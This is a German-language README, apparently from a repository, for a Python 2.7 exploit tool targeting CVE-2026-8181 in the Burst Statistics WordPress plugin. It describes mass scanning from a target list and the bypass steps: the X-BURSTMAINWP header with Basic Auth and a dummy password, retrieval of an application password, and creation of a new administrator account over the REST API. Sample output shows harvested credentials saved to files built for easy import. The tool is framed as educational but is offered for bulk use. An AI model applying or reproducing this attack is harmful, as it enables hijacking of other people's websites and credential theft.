
CVE-2026-8181: Burst Statistics Auth Bypass → REST-API-Übernahme & Admin-Erstellung. Python 2.7. Nur für Bildungszwecke.
Python-2.7-Exploit für die Schwachstelle im Burst-Statistics-Plugin (CVE-2026-8181), der es nicht authentifizierten Angreifern ermöglicht, die REST-API-Authentifizierung zu umgehen, Anwendungspasswörter abzurufen und neue Administrator-Benutzer auf verwundbaren WordPress-Websites zu erstellen.
⚠️ Haftungsausschluss
Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie es nur auf Websites, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben. Weitere Haftungsausschlüsse finden Sie auf der Titelseite von Jenderal92. Sie können sie HIER !!! einsehen.
CVE-2026-8181 betrifft das Burst-Statistics-Plugin für WordPress (Versionen vor dem Patch). Die Schwachstelle liegt im Authentifizierungsmechanismus der REST-API und ermöglicht einem Angreifer Folgendes:
X-BURSTMAINWP-Header gesendet wird/burst/v1/mainwp-auth abrufen//wordpress/wp/wp-json/wp/v2/users oder Autor-ID-Weiterleitungenres_login.txt – Prägnante, mit Pipe getrennte REST-API-Anmeldedaten (leicht zu parsen/importieren)full_res_login.txt – Vollständiger, menschenlesbarer Bericht einschließlich Zugriffsverifizierung und Anwendungspasswörterrequestspip install requests
Erstellen Sie eine Ziellistendatei (eine Domain oder IP pro Zeile, mit oder ohne http:///https://).
Beispiel targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
Führen Sie den Exploit aus:
python2 CVE-2026-8181.py targets.txt
res_login.txt – REST-API-Anmeldedaten (eine Zeile pro verwundbarem Ziel)full_res_login.txt – Detaillierter Bericht| Argument | Beschreibung |
|---|---|
list.txt | Pfad zur Datei, die die Ziel-URLs enthält |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – Prägnante REST-API-AnmeldedatenJede Zeile folgt diesem mit Pipe getrennten Format:
target|username|password|email|user_id
Beispiel:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
Dieses Format ist ideal für:
cut, grep oder Excelfull_res_login.txt – Vollständiger detaillierter BerichtFür jedes verwundbare Ziel fügt das Skript einen menschenlesbaren Block hinzu:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
Hinweis: Wenn der Endpunkt für das Anwendungspasswort nicht verfügbar ist oder kein Token zurückgibt, zeigt dieser Abschnitt
FAILEDan.
http:// als Präfix hinzu, falls es fehlt, und entfernt abschließende Schrägstriche./, /wordpress und /wp als WordPress-Basisverzeichnisse./wp-json/wp/v2/users ab oder nutzt ?author=N-Weiterleitungen.X-BURSTMAINWP: 1 + Basic Auth mit Benutzername und Dummy-Passwort (CVE-2026-8181). Wenn der Endpunkt /wp-json/wp/v2/users/me?context=edit den Status 200 zurückgibt, ist die Website verwundbar./wp-json/burst/v1/mainwp-auth an, um ein Anwendungspasswort-Token zu erhalten./settings, /plugins, /users.POST /wp-json/wp/v2/users.res_login.txt und vollständige Details in full_res_login.txt.Sie können diese Variablen im Skript ändern:
THREADS – Anzahl der gleichzeitigen Threads (Standard: 10)BASE_PATHS – Zusätzliche WordPress-Unterverzeichnisse, die geprüft werden sollenrequests-Timeout-WerteDieses Projekt wird ausschließlich zu Bildungszwecken bereitgestellt. Nutzung auf eigene Gefahr.